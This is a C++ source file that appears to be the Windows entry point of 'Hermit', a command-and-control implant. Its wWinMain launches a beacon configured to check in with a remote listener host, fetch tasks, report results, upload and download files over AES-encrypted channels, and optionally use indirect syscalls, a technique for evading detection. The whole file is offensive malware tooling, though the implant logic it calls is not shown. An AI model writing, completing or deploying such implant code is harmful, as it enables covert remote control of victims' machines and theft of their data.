#include "hermit.hpp"

INT WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, INT nCmdShow)
{	
	Hermit::Run(
		hInstance,
		nCmdShow,
		PAYLOAD_TYPE_W,
		#ifdef PAYLOAD_INDIRECT_SYSCALLS
		TRUE,
		#else
		FALSE,
		#endif
		LISTENER_PROTOCOL_W,
		LISTENER_HOST_W,
		(INTERNET_PORT)LISTENER_PORT,
		REQUEST_PATH_CHECKIN_W,
        REQUEST_PATH_DOWNLOAD_W,
        REQUEST_PATH_TASKGET_W,
        REQUEST_PATH_TASKRESULT_W,
        REQUEST_PATH_UPLOAD_W,
        REQUEST_PATH_WEBSOCKET_W,
		PAYLOAD_SLEEP,
		PAYLOAD_JITTER,
		PAYLOAD_KILLDATE,
		AES_KEY_BASE64_W,
		AES_IV_BASE64_W
	);

	return EXIT_SUCCESS;
}
